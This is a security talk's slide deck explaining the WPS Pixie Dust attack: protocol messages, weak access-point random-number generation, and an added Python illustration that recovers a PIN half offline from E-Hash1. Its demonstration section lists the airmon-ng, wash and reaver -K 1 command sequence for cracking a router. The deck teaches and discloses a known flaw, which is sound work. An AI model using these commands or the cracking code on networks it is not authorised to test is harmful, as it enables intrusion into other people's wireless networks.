WPS Pixie Dust Attack
Sumit Shrivastava
Myself
Sumit Shrivastava – Security Analyst @ Network Intelligence India Pvt. Ltd.
2.5+ years of work experience in the field of Digital Forensics and Assessment
Certifications
Computer Hacking and Forensics Investigator v8, EC-Council
Certified Professional Forensics Analyst, IIS Mumbai
Certified Professional Hacker NxG, IIS Mumbai
Certified Information Security Consultant, IIS Mumbai
Certified Information Security Expert – Level 1, Innobuzz Knowledge Solutions
Once upon a time Android and Web Developer
Today’s takeaway
Introduction to WPS
Terminology
WPS Pin Formats
WPS Negotiation Process
Types of attacks on WPS
Diving into Pixie Dust
P0wning the WiFi Router - Demonstration
Introduction to WPS
Wi-Fi Protected Setup (WPS, Wi-Fi Simple Config)
Uses PIN Method to secure wireless home network
Created by Wi-Fi Alliance, introduced in 2006
Goal – to allow home users, who know very little about wireless security, to add new devices
Major security flaw revealed in December 2011
Allowed brute-forcing the WPS PIN
SEVERELY BROKEN PROTOCOL!!!
Terminology
Enrollee: A device seeking to join a WLAN domain
Registrar: An entity with the authority to issue WLAN credentials
External Registrar: A registrar that is separate from the AP
AP: An infrastructure mode 802.11 Access Point
Note:- The AP and the client device may swap roles, i.e. the AP acts as Enrollee and the client device acts as Registrar, when WPS is used to configure the access point
WPS Pin
A WPS PIN looks like this
This is what your Wi-Fi router has on its back label
WPS Pin Format
WPS Negotiation
Process
M1 – 128-bit random nonce generated by Enrollee (N1||PKE)
M2 – 128-bit random nonce generated by Registrar (N1||N2||PKR||Auth). Auth = HMAC (M1||M2)
M3 – E-Hash1 (E-S1||PSK1||PKE||PKR) OR E-Hash2 (E-S2||PSK2||PKE||PKR)
Types of Attacks on WPS
Online Brute-force
Offline Brute-force
Physical Attack
Diving into Pixie Dust
What do you require?
Hashes -> E-Hash1 and E-Hash2
Public Keys -> PKE, PKR
Authkey
E-Nonce (Enrollee Nonce)
The flaw is in the generation of E-S1 and E-S2, which are pseudo-random numbers
Dominique Bongard found that many APs use an insecure PRNG
Broadlink -> c.rand()
Ralink -> E-S1 and E-S2 are never generated, hence they are always 0
If PRNG state is recovered, E-S1 and E-S2 can be calculated
PSK1 and PSK2 can be calculated from E-Hash1 and E-Hash2
To successfully complete this attack, negotiation should complete within 1 second
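The slide above says that if E-S1 is known, PSK1 falls out of E-Hash1. The following Python is an added illustration, not code from the talk: it builds E-Hash1 the way the WPS spec does (PSK1 = first 128 bits of HMAC-SHA256(AuthKey, first PIN half), E-Hash1 = HMAC-SHA256(AuthKey, E-S1||PSK1||PKE||PKR)) with constructed random stand-ins for AuthKey, PKE and PKR, and contrasts a Ralink-style Enrollee whose E-S1 is always zero with a compliant one that draws a fresh 128-bit E-S1.

```python
import hmac
import hashlib
import secrets

def psk_half(authkey: bytes, pin_half: str) -> bytes:
    """PSK1 / PSK2: first 128 bits of HMAC-SHA256(AuthKey, half of the PIN as ASCII)."""
    return hmac.new(authkey, pin_half.encode(), hashlib.sha256).digest()[:16]

def e_hash(authkey: bytes, e_s: bytes, psk: bytes, pke: bytes, pkr: bytes) -> bytes:
    """E-Hash1 / E-Hash2 as carried in M3: HMAC-SHA256(AuthKey, E-S || PSK || PKE || PKR)."""
    return hmac.new(authkey, e_s + psk + pke + pkr, hashlib.sha256).digest()

def recover_pin_half(ehash: bytes, e_s_guess: bytes, authkey: bytes, pke: bytes, pkr: bytes):
    """Offline check of all 10^4 first-half PIN values against one E-Hash, assuming E-S is e_s_guess.
    Returns the matching half, or None if the guess for E-S was wrong."""
    for n in range(10000):
        cand = f"{n:04d}"
        if e_hash(authkey, e_s_guess, psk_half(authkey, cand), pke, pkr) == ehash:
            return cand
    return None

def demo(pin_first_half: str = "1234"):
    """Weak (E-S1 = 0) versus compliant (random E-S1) Enrollee, same PIN and same session keys."""
    authkey = secrets.token_bytes(32)   # constructed; in WPS it is derived from the DH shared secret
    pke = secrets.token_bytes(192)      # constructed stand-in for the 1536-bit Enrollee DH public key
    pkr = secrets.token_bytes(192)      # constructed stand-in for the Registrar DH public key
    psk1 = psk_half(authkey, pin_first_half)

    weak_es1 = bytes(16)                             # Ralink-style: E-S1 never generated, all zeros
    weak_hash = e_hash(authkey, weak_es1, psk1, pke, pkr)
    strong_es1 = secrets.token_bytes(16)             # compliant: fresh 128-bit secret per session
    strong_hash = e_hash(authkey, strong_es1, psk1, pke, pkr)

    # The checking side knows AuthKey, PKE, PKR and the hash; it assumes E-S1 = 0 in both cases.
    # Only the zero-E-S1 hash yields the PIN half; the random E-S1 hides PSK1 behind 128 unknown bits.
    return (recover_pin_half(weak_hash, bytes(16), authkey, pke, pkr),
            recover_pin_half(strong_hash, bytes(16), authkey, pke, pkr))

if __name__ == "__main__":
    print(demo("1234"))   # → ('1234', None)
```

The whole 10^4 search is ten thousand HMACs, which is why the talk stresses that the secrecy of E-S1 and E-S2, not the PIN length, is what protects M3.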
P0wning the Wi-Fi router
:~# airmon-ng check kill
:~# airmon-ng start <WIFI_INTERFACE>
:~# wash -i <MONITOR_INTERFACE>
:~# reaver -i <MONITOR_INTERFACE> -b <BSSID> -c <CHANNEL> -vv -K 1
P0wned
References
http://ifconfig.dk/pixiedust/
https://en.wikipedia.org/wiki/Wi-Fi_Protected_Setup#Technical_architecture
http://ftp.netbsd.org/pub/NetBSD/NetBSD-current/src/external/bsd/wpa/dist/hostapd/README-WPS
http://archive.hack.lu/2014/Hacklu2014_offline_bruteforce_attack_on_wps.pdf
https://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf
http://www.gta.ufrj.br/ftp/gta/TechReports/wd2012/1569655457.pdf
https://www.wi-fi.org/download.php?file=/sites/default/files/private/wsc_best_practices_v2_0_1.pdf
Questions?
Thank you